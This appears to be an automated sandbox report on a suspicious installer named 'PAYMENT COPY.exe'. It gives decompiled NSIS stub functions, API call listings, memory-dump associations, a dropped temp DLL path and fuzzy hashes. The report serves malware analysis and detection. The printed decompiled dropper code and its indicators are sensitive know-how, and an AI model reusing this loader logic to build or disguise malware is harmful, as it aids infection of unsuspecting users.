                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					L33:
                                                                  					return _t49;
                                                                  				}
                                                                  				E00404D62(0xffffffea,  *(_t87 - 0x34));
                                                                  				 *0x4092a0 =  *0x4092a0 + 1;
                                                                  				_push(_t77);
                                                                  				_push(_t77);
                                                                  				_push( *(_t87 - 8));
                                                                  				_push( *((intOrPtr*)(_t87 - 0x1c)));
                                                                  				_t43 = E00402EBD(); // executed
                                                                  				 *0x4092a0 =  *0x4092a0 - 1;
                                                                  				__eflags =  *(_t87 - 0x18) - 0xffffffff;
                                                                  				_t82 = _t43;
                                                                  				if( *(_t87 - 0x18) != 0xffffffff) {
                                                                  					L22:
                                                                  					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
                                                                  				} else {
                                                                  					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
                                                                  					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
                                                                  						goto L22;
                                                                  					}
                                                                  				}
                                                                  				FindCloseChangeNotification( *(_t87 - 8)); // executed
                                                                  				__eflags = _t82 - _t77;
                                                                  				if(_t82 >= _t77) {
                                                                  					goto L31;
                                                                  				} else {
                                                                  					__eflags = _t82 - 0xfffffffe;
                                                                  					if(_t82 != 0xfffffffe) {
                                                                  						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
                                                                  					} else {
                                                                  						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
                                                                  						lstrcatA(0x409c18,  *(_t87 - 0x34));
                                                                  					}
                                                                  					_push(0x200010);
                                                                  					_push(0x409c18);
                                                                  					E004052BF();
                                                                  					goto L29;
                                                                  				}
                                                                  				goto L33;
                                                                  			}


















                                                                  0x0040179d
                                                                  0x004017a4
                                                                  0x004017ad
                                                                  0x004017b0
                                                                  0x004017b3
                                                                  0x004017b8
                                                                  0x004017c0
                                                                  0x004017dc
                                                                  0x004017c2
                                                                  0x004017c2
                                                                  0x004017c3
                                                                  0x004017c3
                                                                  0x004017e2
                                                                  0x004017ec
                                                                  0x004017ec
                                                                  0x004017f0
                                                                  0x004017f3
                                                                  0x004017f8
                                                                  0x004017fa
                                                                  0x004017fc
                                                                  0x00401801
                                                                  0x00401801
                                                                  0x0040180c
                                                                  0x0040180c
                                                                  0x0040181d
                                                                  0x0040181f
                                                                  0x0040181f
                                                                  0x00401820
                                                                  0x00401820
                                                                  0x00401823
                                                                  0x00401826
                                                                  0x00401829
                                                                  0x0040182f
                                                                  0x0040182f
                                                                  0x00401833
                                                                  0x00401833
                                                                  0x0040183b
                                                                  0x0040184a
                                                                  0x0040184f
                                                                  0x00401852
                                                                  0x00401855
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401857
                                                                  0x0040185a
                                                                  0x004018b4
                                                                  0x004018b9
                                                                  0x004015ca
                                                                  0x004026da
                                                                  0x004026da
                                                                  0x0040292f
                                                                  0x00402932
                                                                  0x00402932
                                                                  0x00000000
                                                                  0x0040185c
                                                                  0x00401862
                                                                  0x0040186d
                                                                  0x0040187a
                                                                  0x00401885
                                                                  0x0040189b
                                                                  0x0040189b
                                                                  0x0040189e
                                                                  0x00000000
                                                                  0x004018a4
                                                                  0x004018a4
                                                                  0x004018a5
                                                                  0x004018c2
                                                                  0x00402938
                                                                  0x00402938
                                                                  0x00402938
                                                                  0x004018a7
                                                                  0x004018a7
                                                                  0x004018a8
                                                                  0x00401495
                                                                  0x00402293
                                                                  0x00402293
                                                                  0x00402293
                                                                  0x004018a5
                                                                  0x0040189e
                                                                  0x0040293a
                                                                  0x0040293e
                                                                  0x0040293e
                                                                  0x004018d2
                                                                  0x004018d7
                                                                  0x004018dd
                                                                  0x004018de
                                                                  0x004018df
                                                                  0x004018e2
                                                                  0x004018e5
                                                                  0x004018ea
                                                                  0x004018f0
                                                                  0x004018f4
                                                                  0x004018f6
                                                                  0x004018fe
                                                                  0x0040190a
                                                                  0x004018f8
                                                                  0x004018f8
                                                                  0x004018fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004018fc
                                                                  0x00401913
                                                                  0x00401919
                                                                  0x0040191b
                                                                  0x00000000
                                                                  0x00401921
                                                                  0x00401921
                                                                  0x00401924
                                                                  0x0040193c
                                                                  0x00401926
                                                                  0x00401929
                                                                  0x00401932
                                                                  0x00401932
                                                                  0x00401941
                                                                  0x00401946
                                                                  0x0040228e
                                                                  0x00000000
                                                                  0x0040228e
                                                                  0x00000000

                                                                  APIs
                                                                  • lstrcatA.KERNEL32(00000000,00000000,Rcxlxosdkhvclf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                                  • CompareFileTime.KERNEL32(-00000014,?,Rcxlxosdkhvclf,Rcxlxosdkhvclf,00000000,00000000,Rcxlxosdkhvclf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                                  • GetFileAttributesA.KERNELBASE(Rcxlxosdkhvclf,Rcxlxosdkhvclf,00000000,00000000,Rcxlxosdkhvclf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                                  • SetFileAttributesA.KERNELBASE(Rcxlxosdkhvclf,00000000), ref: 00401833
                                                                    • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                    • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                    • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                    • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                    • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll$Rcxlxosdkhvclf
                                                                  • API String ID: 1152937526-3079134523
                                                                  • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                  • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                                                  • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                  • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 95%
                                                                  			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                  				struct _OVERLAPPED* _v8;
                                                                  				long _v12;
                                                                  				void* _v16;
                                                                  				long _v20;
                                                                  				long _v24;
                                                                  				intOrPtr _v28;
                                                                  				char _v92;
                                                                  				void* _t68;
                                                                  				void* _t69;
                                                                  				int _t74;
                                                                  				long _t75;
                                                                  				intOrPtr _t79;
                                                                  				long _t80;
                                                                  				void* _t82;
                                                                  				int _t84;
                                                                  				void* _t99;
                                                                  				void* _t100;
                                                                  				long _t101;
                                                                  				int _t102;
                                                                  				long _t103;
                                                                  				int _t104;
                                                                  				intOrPtr _t105;
                                                                  				long _t106;
                                                                  				void* _t107;
                                                                  
                                                                  				_t102 = _a16;
                                                                  				_t99 = _a12;
                                                                  				_v12 = _t102;
                                                                  				if(_t99 == 0) {
                                                                  					_v12 = 0x8000;
                                                                  				}
                                                                  				_v8 = 0;
                                                                  				_v16 = _t99;
                                                                  				if(_t99 == 0) {
                                                                  					_v16 = 0x78d938;
                                                                  				}
                                                                  				_t66 = _a4;
                                                                  				if(_a4 >= 0) {
                                                                  					E004030FF( *0x7a2fd8 + _t66);
                                                                  				}
                                                                  				_t68 = E004030CD( &_a16, 4); // executed
                                                                  				if(_t68 == 0) {
                                                                  					L44:
                                                                  					_push(0xfffffffd);
                                                                  					goto L45;
                                                                  				} else {
                                                                  					if((_a19 & 0x00000080) == 0) {
                                                                  						if(_t99 != 0) {
                                                                  							if(_a16 < _t102) {
                                                                  								_t102 = _a16;
                                                                  							}
                                                                  							if(E004030CD(_t99, _t102) != 0) {
                                                                  								_v8 = _t102;
                                                                  								L47:
                                                                  								return _v8;
                                                                  							} else {
                                                                  								goto L44;
                                                                  							}
                                                                  						}
                                                                  						if(_a16 <= 0) {
                                                                  							goto L47;
                                                                  						}
                                                                  						while(1) {
                                                                  							_t103 = _v12;
                                                                  							if(_a16 < _t103) {
                                                                  								_t103 = _a16;
                                                                  							}
                                                                  							if(E004030CD(0x789938, _t103) == 0) {
                                                                  								goto L44;
                                                                  							}
                                                                  							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
                                                                  							if(_t74 == 0 || _t103 != _a12) {
                                                                  								L30:
                                                                  								_push(0xfffffffe);
                                                                  								L45:
                                                                  								_pop(_t69);
                                                                  								return _t69;
                                                                  							} else {
                                                                  								_v8 = _v8 + _t103;
                                                                  								_a16 = _a16 - _t103;
                                                                  								if(_a16 > 0) {
                                                                  									continue;
                                                                  								}
                                                                  								goto L47;
                                                                  							}
                                                                  						}
                                                                  						goto L44;
                                                                  					}
                                                                  					_t75 = GetTickCount();
                                                                  					_t13 =  &_a16;
                                                                  					 *_t13 = _a16 & 0x7fffffff;
                                                                  					_v20 = _t75;
                                                                  					 *0x40b038 = 0xb;
                                                                  					 *0x40b050 = 0;
                                                                  					_a4 = _a16;
                                                                  					if( *_t13 <= 0) {
                                                                  						goto L47;
                                                                  					}
                                                                  					while(1) {
                                                                  						L10:
                                                                  						_t104 = 0x4000;
                                                                  						if(_a16 < 0x4000) {
                                                                  							_t104 = _a16;
                                                                  						}
                                                                  						if(E004030CD(0x789938, _t104) == 0) {
                                                                  							goto L44;
                                                                  						}
                                                                  						_a16 = _a16 - _t104;
                                                                  						 *0x40b028 = 0x789938;
                                                                  						 *0x40b02c = _t104;
                                                                  						while(1) {
                                                                  							_t100 = _v16;
                                                                  							 *0x40b030 = _t100;
                                                                  							 *0x40b034 = _v12;
                                                                  							_t79 = E00405D9D(0x40b028);
                                                                  							_v28 = _t79;
                                                                  							if(_t79 < 0) {
                                                                  								break;
                                                                  							}
                                                                  							_t105 =  *0x40b030; // 0x78ef38
                                                                  							_t106 = _t105 - _t100;
                                                                  							_t80 = GetTickCount();
                                                                  							_t101 = _t80;
                                                                  							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                                  								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                  								_t107 = _t107 + 0xc;
                                                                  								E00404D62(0,  &_v92);
                                                                  								_v20 = _t101;
                                                                  							}
                                                                  							if(_t106 == 0) {
                                                                  								if(_a16 > 0) {
                                                                  									goto L10;
                                                                  								}
                                                                  								goto L47;
                                                                  							} else {
                                                                  								if(_a12 != 0) {
                                                                  									_v12 = _v12 - _t106;
                                                                  									_v8 = _v8 + _t106;
                                                                  									_t82 =  *0x40b030; // 0x78ef38
                                                                  									_v16 = _t82;
                                                                  									if(_v12 < 1) {
                                                                  										goto L47;
                                                                  									}
                                                                  									L25:
                                                                  									if(_v28 != 4) {
                                                                  										continue;
                                                                  									}
                                                                  									goto L47;
                                                                  								}
                                                                  								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                                  								if(_t84 == 0 || _v24 != _t106) {
                                                                  									goto L30;
                                                                  								} else {
                                                                  									_v8 = _v8 + _t106;
                                                                  									goto L25;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						_push(0xfffffffc);
                                                                  						goto L45;
                                                                  					}
                                                                  					goto L44;
                                                                  				}
                                                                  			}



























                                                                  0x00402ec5
                                                                  0x00402ec9
                                                                  0x00402ed0
                                                                  0x00402ed3
                                                                  0x00402ed5
                                                                  0x00402ed5
                                                                  0x00402ede
                                                                  0x00402ee1
                                                                  0x00402ee4
                                                                  0x00402ee6
                                                                  0x00402ee6
                                                                  0x00402eed
                                                                  0x00402ef2
                                                                  0x00402efd
                                                                  0x00402efd
                                                                  0x00402f08
                                                                  0x00402f0f
                                                                  0x004030bb
                                                                  0x004030bb
                                                                  0x00000000
                                                                  0x00402f15
                                                                  0x00402f19
                                                                  0x0040305e
                                                                  0x004030ab
                                                                  0x004030ad
                                                                  0x004030ad
                                                                  0x004030b9
                                                                  0x004030c0
                                                                  0x004030c3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004030b9
                                                                  0x00403063
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040306a
                                                                  0x0040306a
                                                                  0x00403070
                                                                  0x00403072
                                                                  0x00403072
                                                                  0x0040307e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040308b
                                                                  0x00403093
                                                                  0x00403058
                                                                  0x00403058
                                                                  0x004030bd
                                                                  0x004030bd
                                                                  0x00000000
                                                                  0x0040309a
                                                                  0x0040309a
                                                                  0x0040309d
                                                                  0x004030a4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004030a6
                                                                  0x00403093
                                                                  0x00000000
                                                                  0x0040306a
                                                                  0x00402f1f
                                                                  0x00402f25
                                                                  0x00402f25
                                                                  0x00402f2c
                                                                  0x00402f32
                                                                  0x00402f39
                                                                  0x00402f3f
                                                                  0x00402f42
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402f4d
                                                                  0x00402f4d
                                                                  0x00402f4d
                                                                  0x00402f55
                                                                  0x00402f57
                                                                  0x00402f57
                                                                  0x00402f63
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402f69
                                                                  0x00402f6c
                                                                  0x00402f72
                                                                  0x00402f78
                                                                  0x00402f78
                                                                  0x00402f83
                                                                  0x00402f89
                                                                  0x00402f8e
                                                                  0x00402f95
                                                                  0x00402f98
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402f9e
                                                                  0x00402fa4
                                                                  0x00402fa6
                                                                  0x00402fb3
                                                                  0x00402fb5
                                                                  0x00402fe3
                                                                  0x00402fe9
                                                                  0x00402ff2
                                                                  0x00402ff7
                                                                  0x00402ff7
                                                                  0x00402ffe
                                                                  0x0040304c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403000
                                                                  0x00403003
                                                                  0x00403025
                                                                  0x00403028
                                                                  0x0040302b
                                                                  0x00403034
                                                                  0x00403037
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040303d
                                                                  0x00403041
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403047
                                                                  0x00403011
                                                                  0x00403019
                                                                  0x00000000
                                                                  0x00403020
                                                                  0x00403020
                                                                  0x00000000
                                                                  0x00403020
                                                                  0x00403019
                                                                  0x00402ffe
                                                                  0x00403054
                                                                  0x00000000
                                                                  0x00403054
                                                                  0x00000000
                                                                  0x00402f4d

                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402F1F
                                                                  • GetTickCount.KERNEL32 ref: 00402FA6
                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                                                  • wsprintfA.USER32 ref: 00402FE3
                                                                  • WriteFile.KERNELBASE(00000000,00000000,0078EF38,7FFFFFFF,00000000), ref: 00403011
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: CountTick$FileWritewsprintf
                                                                  • String ID: ... %d%%$8x
                                                                  • API String ID: 4209647438-795837185
                                                                  • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                  • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                                                  • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                  • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,55E38B1F,?,050A26AF,?,D6EB2188,?,433A3842), ref: 026407E9
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 026409B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341529423.0000000002640000.00000040.00000001.sdmp, Offset: 02640000, based on PE: false
                                                                  Similarity
                                                                  • API ID: CreateFileFreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 204039940-0
                                                                  • Opcode ID: 6e029473e75cb6bb13379a96ad9d56a87bb92bbf53d4efb1a2921f1b1b332dcb
                                                                  • Instruction ID: 1708eec02c537e4a69e2101247867352bcdfb54652095d74ab43d1f7d7ab9c9b
                                                                  • Opcode Fuzzy Hash: 6e029473e75cb6bb13379a96ad9d56a87bb92bbf53d4efb1a2921f1b1b332dcb
                                                                  • Instruction Fuzzy Hash: 6DA10130D01218EFEF14DFE4C945BADBBB2BF08315F205459E695BA2A0DB745A80DF54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02641472
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 026414CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341529423.0000000002640000.00000040.00000001.sdmp, Offset: 02640000, based on PE: false
                                                                  Similarity
                                                                  • API ID: AllocCreateFileVirtual
                                                                  • String ID:
                                                                  • API String ID: 1475775534-0
                                                                  • Opcode ID: 2488b7fa479a2250484780fe38f0b2802325090000fbc83ddbf0d82471f121dd
                                                                  • Instruction ID: fb066985bcec1c559c4835039c9527912cf4b8657a3683cdeeec8c5fbcfe1454
                                                                  • Opcode Fuzzy Hash: 2488b7fa479a2250484780fe38f0b2802325090000fbc83ddbf0d82471f121dd
                                                                  • Instruction Fuzzy Hash: B951E571E4121CBAEF20ABE0CC09FEDBA79BF09701F104599F659B61D0DBB05A808F15
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 84%
                                                                  			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
                                                                  				int _t19;
                                                                  				struct _SECURITY_ATTRIBUTES* _t20;
                                                                  				signed char _t22;
                                                                  				struct _SECURITY_ATTRIBUTES* _t23;
                                                                  				CHAR* _t25;
                                                                  				struct _SECURITY_ATTRIBUTES** _t27;
                                                                  				struct _SECURITY_ATTRIBUTES** _t29;
                                                                  				void* _t30;
                                                                  
                                                                  				_t23 = __ebx;
                                                                  				_t25 = E00402A9A(0xfffffff0);
                                                                  				_t27 = E0040555F(_t25);
                                                                  				if( *_t25 != __ebx && _t27 != __ebx) {
                                                                  					do {
                                                                  						_t29 = E004054F7(_t27, 0x5c);
                                                                  						 *_t29 = _t23;
                                                                  						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                  						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                  						if(_t19 == 0) {
                                                                  							if(GetLastError() != 0xb7) {
                                                                  								L5:
                                                                  								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                  							} else {
                                                                  								_t22 = GetFileAttributesA(_t25); // executed
                                                                  								if((_t22 & 0x00000010) == 0) {
                                                                  									goto L5;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                  						 *_t29 = _t20;
                                                                  						_t27 =  &(_t29[0]);
                                                                  					} while (_t20 != _t23);
                                                                  				}
                                                                  				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                  					_push(0xfffffff5);
                                                                  					E00401428();
                                                                  				} else {
                                                                  					E00401428(0xffffffe6);
                                                                  					E004059BF("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
                                                                  					SetCurrentDirectoryA(_t25); // executed
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
                                                                  				return 0;
                                                                  			}











                                                                  0x004015d5
                                                                  0x004015dc
                                                                  0x004015e6
                                                                  0x004015e8
                                                                  0x004015ee
                                                                  0x004015f6
                                                                  0x004015fc
                                                                  0x004015fe
                                                                  0x00401601
                                                                  0x00401609
                                                                  0x00401616
                                                                  0x00401623
                                                                  0x00401623
                                                                  0x00401618
                                                                  0x00401619
                                                                  0x00401621
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401621
                                                                  0x00401616
                                                                  0x00401626
                                                                  0x00401629
                                                                  0x0040162b
                                                                  0x0040162c
                                                                  0x004015ee
                                                                  0x00401633
                                                                  0x00401653
                                                                  0x004021e8
                                                                  0x00401635
                                                                  0x00401637
                                                                  0x00401642
                                                                  0x00401648
                                                                  0x00401648
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                    • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 0040556D
                                                                    • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                                                    • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                                                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                                  • API String ID: 3751793516-1104044542
                                                                  • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                  • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                                                  • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                  • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                  				signed int _t11;
                                                                  				int _t14;
                                                                  				signed int _t16;
                                                                  				void* _t19;
                                                                  				CHAR* _t20;
                                                                  
                                                                  				_t20 = _a4;
                                                                  				_t19 = 0x64;
                                                                  				while(1) {
                                                                  					_t19 = _t19 - 1;
                                                                  					_a4 = 0x61736e;
                                                                  					_t11 = GetTickCount();
                                                                  					_t16 = 0x1a;
                                                                  					_a6 = _a6 + _t11 % _t16;
                                                                  					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                  					if(_t14 != 0) {
                                                                  						break;
                                                                  					}
                                                                  					if(_t19 != 0) {
                                                                  						continue;
                                                                  					}
                                                                  					 *_t20 =  *_t20 & 0x00000000;
                                                                  					return _t14;
                                                                  				}
                                                                  				return _t20;
                                                                  			}








                                                                  0x004056c3
                                                                  0x004056c9
                                                                  0x004056ca
                                                                  0x004056ca
                                                                  0x004056cb
                                                                  0x004056d2
                                                                  0x004056dc
                                                                  0x004056e9
                                                                  0x004056ec
                                                                  0x004056f4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004056f8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004056fa
                                                                  0x00000000
                                                                  0x004056fa
                                                                  0x00000000

                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 004056D2
                                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                                                  • nsa, xrefs: 004056CB
                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
